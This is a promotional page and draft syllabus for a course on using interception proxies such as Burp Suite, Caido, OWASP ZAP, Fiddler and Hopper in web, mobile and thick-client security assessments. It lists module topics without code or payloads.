

Course Releases Feb 18
Interception Proxies for Modern Security Assessments:
This course is designed to provide in-depth knowledge of interception proxies like Burp Suite, Caido, OWASP ZAP, Fiddler, and Hopper. By mastering these tools, you’ll gain the skills necessary to conduct security assessments on modern applications.
What You’ll Learn:
- Set up and use various interception proxies effectively.
- Understand the unique strengths and weaknesses of Burp Suite, Caido, OWASP ZAP, Fiddler, and Hopper.
- Perform security testing on web applications, mobile apps, and thick clients.
- Explore plugin ecosystems and third-party integrations for advanced capabilities.
- Analyze real-world case studies of vulnerabilities discovered using interception proxies.
Why Choose This Course?
- Comprehensive and Tool-Agnostic: Learn multiple tools to tailor your approach based on project needs.
- Practical Focus: Hands-on labs and real-world case studies ensure you can apply concepts immediately.
- Expert Guidance: Jhaddix shares proven methods and advanced tips gleaned from years of experience.
Who Should Enroll?
- Security professionals seeking to expand their toolkit.
- Penetration testers and bug bounty hunters aiming to deepen their expertise.
- Developers and QA specialists integrating security into their workflows.
- Anyone looking to master modern interception proxies for effective security assessments.
What’s Included:
- Video modules covering theoretical and practical topics.
- Hands-on labs with real-world scenarios.
** This syllabus is still in draft. It may not represent the full gamut of topics in the final class **
Course Outline:
Module 1: Introduction to Interception Proxies
Why Interception Proxies Are Essential:
- The role of proxies in application security testing.
- Practical applications: Debugging, reconnaissance, and exploitation.
Overview of Key Tools:
- Burp Suite: The industry standard for web application security testing.
- Caido: A fresh perspective on interception proxies with modern UI/UX.
- OWASP ZAP: Open-source and highly extensible for community-driven testing.
- Fiddler: A Powerful tool for analyzing Windows based thick client HTTP/S traffic.
- Hopper: A brief overview of an alternative for Mac Systems.
Activity:
- Install and configure the proxy tools to intercept basic web traffic.
- Discuss "gotchas"
Module 2: Tool-Specific Deep Dives
Burp Suite:
- Setting up projects, workspaces, and target scoping.
- Using key tools: Repeater, Intruder, and Scanner.
- Must-have plugins
Caido:
- Exploring the modern interface and workflow.
- Comparison with Burp Suite: Strengths and use cases.
OWASP ZAP:
- Crawling and passive scanning workflows.
- Extending functionality with add-ons like Active Scan Rules and HUD.
- Integrating into automated DAST
Fiddler:
- Why Fiddler?
- Capturing and replaying traffic for debugging and testing.
- A cursory look at FiddlerScript for custom scenarios.
Hopper:
- Analyzing and intercepting traffic from thick clients.
Module 3: Web Application Testing with Proxies
Workflows for Web Application Testing:
- Mapping applications with crawlers and manual exploration.
- Identifying and exploiting common vulnerabilities: XSS, SQLi, CSRF, and more.
Enhancing Productivity:
- Leveraging automation and macros in Burp Suite and ZAP.
- Integrating withy command line workflows for testers
Module 4: Mobile Application and Thick Client Testing
Mobile Application Proxying:
- Setting up proxies for mobile traffic interception.
- Testing APIs, analyzing insecure storage, and bypassing SSL pinning.
Thick Client Proxying with Hopper and Fiddler:
- Reverse engineering traffic from proprietary protocols.
- Analyzing communication channels for security flaws.
Activity:
- Intercept and analyze API traffic from a mobile application and a thick client.
Module 5: Plugins, Extensions, and Third-Party Integrations
Extending Proxy Capabilities:
- Key plugins for Burp Suite and ZAP that enhance testing efficiency.
- Exploring Caido’s ecosystem of integrations.
- Introduction to fuzzing payload projects.
Integrating Fuzzers and Automation Tools:
- Using ffuf, wfuzz, and other tools with proxies.
Authentication and Session Handling:
- Testing authentication flows (OAuth, SAML, JWT).
Module 6: Case Studies and Advanced Scenarios
Case Studies:
- Examples of real-world vulnerabilities uncovered using proxies.
- Creative solutions to challenges like WAFs, Captchas, and rate limiting.